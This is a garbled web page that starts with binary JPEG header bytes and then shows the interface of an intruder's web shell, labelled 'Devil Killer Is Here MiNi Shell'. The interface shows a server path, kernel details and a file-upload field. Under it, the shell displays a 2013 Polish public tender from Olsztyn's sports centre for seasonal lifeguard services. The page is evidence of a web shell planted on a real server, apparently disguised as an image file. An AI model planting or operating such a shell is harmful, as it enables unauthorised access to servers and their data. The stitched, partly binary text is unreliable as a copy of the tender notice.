JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130305/88908-N-2013.html

<p class="kh_header"><b>Olsztyn: Obsługa ratownicza kąpielisk sezonowych organizowanych przez Ośrodek Sportu i Rekreacji w Olsztynie w sezonie letnim 2013 roku (II postępowanie)</b><br>
<b>Numer ogłoszenia: 88908 - 2013; data zamieszczenia: 05.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji w Olsztynie , ul. Żołnierska 13 A, 10-558 Olsztyn, woj. warmińsko-mazurskie, tel. 89 5335132, faks 89 5335132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osir.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa ratownicza kąpielisk sezonowych organizowanych przez Ośrodek Sportu i Rekreacji w Olsztynie w sezonie letnim 2013 roku (II postępowanie).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Obsługa ratownicza kąpielisk sezonowych organizowanych przez Ośrodek Sportu i Rekreacji w Olsztynie w sezonie letnim 2013 r., polegająca na zapewnieniu bezpieczeństwa osób kąpiących się, pływających oraz przebywających na terenie organizowanych kąpielisk przez uprawnionych ratowników wodnych. I.Obsługa ratownicza powinna być realizowana na kąpieliskach w n/w terminach i podanej liczbie ratowników wodnych.ZADANIE  A: Zespół Obiektów Wypoczynkowo-Rekreacyjnych (Plaża Miejska) w Olsztynie przy ul. Jeziornej 8 (akwen jeziora Ukiel). l. Kąpielisko Plaża Miejska:-kąpielisko o wymiarach ok. 95m x 25m;a)chronione będzie w okresie od 15.06.2013r. do dnia 01.09.2013r. przez minimum 3 ratowników wodnych. Kąpielisko będą chronione w w/w okresach codziennie w godzinach 10.00-19.00. (łącznie: 711 h x 3ratowników = 2.133 h). Razem zadanie A: Kąpielisko ZOWR: 2.133 h. ZADANIE B: Kąpieliska Sezonowe j.n.:
l. Kąpielisko Słoneczna Polana, na plaży przy Bazie Sportów Wodnych Słoneczna Polana ul. Sielska 38 (akwen jeziora Ukiel), kąpielisko o wymiarach ok. 50m x 25m. - Kąpielisko chronione będzie codziennie w okresie od 28.06.2013 r. do 01.09.2013 r. w godzinach 10.00-18.00 przez 2 ratowników wodnych. (łącznie: 528 h x 2ratowników = 1056 h).2. Kąpielisko Marina, na plaży przy Przystani Marina ul. Jeziorna 6 (akwen jeziora Ukiel), kąpielisko o wymiarach ok. 25m x 25m. - Kąpielisko chronione będzie codziennie w okresie od 28.06.2013r. do 01.09.2013r. w godzinach 10.00-18.00 przez 2 ratowników wodnych. (łącznie: 528 h x 2ratowników = 1056 h).3. Kąpielisko Skanda, na plaży nad Jeziorem Skanda ul. Plażowa (akwen jeziora Skanda), kąpielisko o wymiarach ok. 25m x 25m. - Kąpielisko chronione będzie codziennie w okresie od 28.06.2013 r. do 01.09.2013 r. w godzinach 10.00-18.00 przez 2 ratowników wodnych. (łącznie: 528 h x 2ratowników = 1056 h). Razem zadanie B: Kąpielisku Sezonowe (3szt.): 3.168 h.II.	Wszyscy ratownicy powinni posiadać uprawnienia w stopniu Ratownika Wodnego zgodnie z Ustawą z dn. 18.08.2011 r. O bezpieczeństwie osób przebywających na obszarach wodnych, aktualne badania lekarskie, ubezpieczenie OC w związku z wykonywaniem obowiązków ratownika WOPR, aktualne legitymacje Ratownika WOPR, własny strój ratownika (tj. koszulka, spodenki f czapka w kolorze czerwonym lub pomarańczowym) oraz sprzęt do nurkowania (tj. płetwy, maska, fajka).III.	Do podstawowych obowiązków ratowników należy:1) stała obserwacja kąpieliska i niezwłoczne reagowanie na każdy sygnał wzywania pomocy oraz podejmowanie akcji ratowniczej;2) kontrola stanu urządzeń oraz sprzętu, które zapewniają bezpieczeństwo osób kąpiących się; 3)kontrola stref dla umiejących i nieumiejących pływać; 4) wywieszanie na maszcie odpowiedniego koloru flag informacyjnych; 5) sygnalizowanie, za pomocą urządzeń alarmowych przekroczeń obowiązującego Regulaminu Kąpieliska oraz w razie potrzeby np.: nadchodzącej burzy; 6) reagowanie na wszelkie wypadki naruszenia regulaminu obowiązującego na terenie kąpieliska; 7) wpisywanie na tablicy informacyjnej temperatury wody, powietrza oraz innych aktualnych informacji; 8)	codzienne kontrolowanie głębokości wody przed otwarciem kąpieliska, a w razie potrzeby - przesunięcie miejsca kąpieli lub czasowe wyłączenie określonych obszarów kąpieliska z używalności; 9) oczyszczanie powierzchni dna obszaru przeznaczonego do kąpieli z wszelkich przedmiotów mogących spowodować skaleczenie lub inny nieszczęśliwy wypadek; 10) w razie konieczności oczyszczanie kąpieliska z roślin wodnych (w tym zachowanie należytej czystości linii brzegowej kąpielisk); 11) bieżące prowadzenie Dziennika Pracy; 12) utrzymywanie stałej łączności z Dyżurnym Miasta (składanie meldunków o rozpoczęciu i zakończeniu dyżuru, wypadkach i innych zagrożeniach); 13) udzielanie 1-szej pomocy przedmedycznej (w oparciu o udostępniony sprzęt 1-szej pomocy i apteczkę); 14) prowadzenie Rejestru Zdarzeń (wypadków); 15) dbanie o powierzony sprzęt ratunkowy oraz zabezpieczanie go przed ewentualnym zniszczeniem; 16)	utrzymywanie porządku w pomieszczeniach ratowników i wykorzystywanie go wyłącznie do celów służbowych; 17) ratowników na stanowisku pracy obowiązuje zakaz używania urządzeń elektronicznych typu laptop, odtwarzacz multimediałny itp.; 18) pełnienie dyżurów w jednolitych strojach, jednoznacznie identyfikujących służbę ratowniczą; 19) zgłaszanie kierownictwu obiektu konieczności uzupełnienia sprzętu ratowniczego i medycznego w zależności od potrzeb i terminów ważności ich użycia; 20) bezzwłoczne zgłaszanie odpowiednim pracownikom obiektów lub Kierownikowi obiektów zauważonych uszkodzeń, w szczególności tych które stwarzają zagrożenie dla użytkowników i których naprawa wymaga odpowiednich kwalifikacji zawodowych; 21) wykonywanie innych prac wynikających z zadań i obowiązków ratowników oraz zlecanych przez Kierownika obiektu wchodzących w zakres obowiązków ratownika; 22) przestrzeganie procedur określonych w Regulaminach Obiektów. IV. Organizacja kąpieliska, wyposażenie w wymagany sprzęt ratunkowy oraz inne urządzenia wymagane przepisami prawa zapewnia OSiR (z wyjątkiem pkt. II). V. Wyznaczenie (i likwidacja po zakończonym sezonie) granic kąpielisk, stref dla umiejących i nieumiejących pływać wykonają ratownicy wodni ze sprzętu dostarczonego przez OSiR, w uzgodnieniu z Kierownikiem obiektów odpowiedzialnym za działalność poszczególnych kąpielisk ośrodka. VI. Przed przystąpieniem do wykonywania zadania wykonawca zobowiązany jest do przygotowania procedur jakimi będzie się posługiwał w trakcie wykonywania usługi. W przygotowanym opracowaniu powinny się znaleźć między innymi: a) procedura przygotowania obiektu do pracy w zakresie bezpieczeństwa użytkowników, b) procedura postępowania w razie wypadku, c) procedura postępowania w przypadku naruszania regulaminu przez użytkowników obiektu, VII. Podmiot zatrudniający ratowników (wykonawca umowy) prowadzi bezpośredni nadzór i jest odpowiedzialny za całokształt spraw związanych z pracą ratowników (np.: respektowanie przez ratowników zapisów Regulaminów Kąpielisk, ich zachowań oraz innych postanowień zawartej z OSiR umowy). W zakresie tym ściśle współpracuje z odpowiedzialnym Kierownikiem OSiR. VIII.	Realizacja umowy - w zakresie obsługi ratowniczej - przebiega zgodnie z przepisami prawa obowiązującymi w tym zakresie w trakcie obowiązywania umowy, a szczególności wynikających z: 1) ustawy z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz. U. z 2011 r. Nr 208, poz. 1240); 2) aktualnym rozporządzeniem Ministra Spraw Wewnętrznych i Administracji  w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych (Dz.U.2012.108); 3)	rozporządzenie Ministra Spraw Wewnętrznych z 6.03.2012 r. w sprawie sposobu oznakowania i zabezpieczania obszarów Wodnych oraz znaków zakazu, nakazu oraz znaków informacyjnych i flag (Dz. U. z 2012 r. poz. 286). IX. Zamawiający zastrzega, że poszczególne zadania (A i B) muszą być realizowane przez jednego wykonawcę. Zamawiający nie dopuszcza realizacji zadań przez różne podmioty. X. Zamawiający, w związku z planowaną inwestycją na terenie ZOWR (Plaża Miejska), zastrzega sobie możliwość wprowadzenia zmian w zadaniu A j.n.: - ostateczną decyzję o organizacji kąpieliska, jego szczegółowej lokalizacji na terenie ZOWR oraz terminie funkcjonowania zamawiający określi do dnia 15.05.2013 r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.31.72.00-5, 92.33.20.00-7, 92.62.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 15.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM 
1.Zamawiający żąda wniesienia wadium w wysokości 5.000 zł.
2.Wadium należy wnieść przed upływem składania ofert tj. do 15.03.2013 r. do godz. 13:00
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)w pieniądzu - potwierdzonym   przelewem na konto OSiR Nr rachunku  60 1030 1218 00000000 9050 5068,
2)Poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo Kredytowej,
3)Gwarancjach bankowych,
4)Gwarancjach ubezpieczeniowych,
5)Poręczeniach udzielonych przez przedmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopad 2000 r.  O utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr. 109 poz. 1158, z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, zamawiający żąda, by wykonawca złożył oświadczenie wg załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia, zamawiający żąda by wykonawca wykazał, iż posiada doświadczenie w zakresie prowadzenia usług zabezpieczenia ratowniczego na pływalniach lub kąpieliskach, co najmniej 2 zamówienia o wartości minimum 40.000,00 zł brutto - Wykaz wykonanych usług wg wzoru Załącznik Nr 4 do SIWZ z oświadczeniem wg załącznika Nr 2 do SIWZ. Do wykazu wykonanych usług należy dołączyć dowody, czy zostały wykonane lub są wykonywane należycie - poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania  ofert</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia zamawiający żąda by wykonawca wykazał, iż dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług, tj. posiadające uprawnienia co najmniej ratownika wodnego śródlądowego zgodnie z Uchwałą Prezydium ZG WOPR Nr 5/6/09 z dnia 5.12.2009 r. w sprawie stopni ratowników i instruktorów.
Dla wykazania, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia - Zamawiający żąda złożenie oświadczenia wg załącznika Nr 2 do SIWZ oraz wykazu osób z podaniem nazwiska i imienia ratownika, kwalifikacji zawodowych (stopień, nr uprawnień) wraz z kserokopią aktualnej legitymacji Ratownika WOPR lub innym dokumentem potwierdzającym posiadane kwalifikacje i ważnym zaświadczeniem o uzyskaniu tytułu ratownika na podstawie Ustawy o Państwowym Ratownictwie Medycznym, planowanej funkcji podczas wykonywania zadania oraz informacja czy posiadają aktualne zaświadczenie lekarskie poświadczające zdolność do pełnienia funkcji ratownika oraz wskaże podstawę dysponowania tymi osobami wg załącznika Nr 5 do SIWZ oraz złoży oświadczenie, że osoby posiadają wymagane uprawnienia wg wzoru Załącznik Nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia zamawiający żąda by wykonawca wykazał, iż dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług, tj. posiadające uprawnienia co najmniej ratownika wodnego śródlądowego zgodnie z Uchwałą Prezydium ZG WOPR Nr 5/6/09 z dnia 5.12.2009 r. w sprawie stopni ratowników i instruktorów.
Dla wykazania, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia - Zamawiający żąda złożenie oświadczenia wg załącznika Nr 2 do SIWZ oraz wykazu osób z podaniem nazwiska i imienia ratownika, kwalifikacji zawodowych (stopień, nr uprawnień) wraz z kserokopią aktualnej legitymacji Ratownika WOPR lub innym dokumentem potwierdzającym posiadane kwalifikacje i ważnym zaświadczeniem o uzyskaniu tytułu ratownika na podstawie Ustawy o Państwowym Ratownictwie Medycznym, planowanej funkcji podczas wykonywania zadania oraz informacja czy posiadają aktualne zaświadczenie lekarskie poświadczające zdolność do pełnienia funkcji ratownika oraz wskaże podstawę dysponowania tymi osobami wg załącznika Nr 5 do SIWZ oraz złoży oświadczenie, że osoby posiadają wymagane uprawnienia wg wzoru Załącznik Nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania odpowiedniej sytuacji ekonomicznej i finansowej zamawiający żąda, by wykonawca złożył oświadczenie (załącznik Nr 2 do SIWZ) oraz udokumentował, że posiada opłaconą polisę ubezpieczeniową, a  w przypadku jej braku inny dokument, potwierdzający, że Wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie usług objętych przedmiotem zamówienia na kwotę nie niższą niż  500 000 zł. 
Ocena warunku nastąpi na podstawie kopi polisy lub innego dokumentu i oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Do wykazu wykonanych usług należy dołączyć dowody, czy zostały wykonane lub są wykonywane należycie - poświadczenia, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania  ofert. 2. Formularz oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.Zakazuje się istotnych zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień do umowy, niekorzystnych dla zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. 
5.Zamawiający zastrzega sobie, że w przypadkach szczególnych - np. ograniczonej kwoty środków finansowych przeznaczonych na realizację przedmiotu zamówienia będzie miał prawo w  trakcie realizacji ograniczyć zakres rzeczowy usługi bez żadnych skutków prawno - finansowych albo rozwiązać umowę bez wypowiedzenia.
6.Umowa będzie realizowania do wysokości środków finansowych posiadanych przez Zamawiającego na realizację zadania w 2013 r. 
7.Zamawiający zastrzega sobie prawo odstąpienia od umowy w całości lub w części, lub jej rozwiązanie za 14 dniowym wypowiedzeniem w szczególności w przypadku nienależytego wykonywania umowy przez Wykonawcę.
8.Zamawiający zastrzega sobie prawo zmiany umowy w zakresie wyłączenia z zakresu umowy części usług poprzez zmniejszenie ilości świadczonych usług, skrócenie czasu trwania umowy.
9.W przypadkach określonych w § 4 ust. 3, 5, 6, 7 i 8  umowy Wykonawcy przysługiwać będzie wynagrodzenie za faktyczne wykonane usługi</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
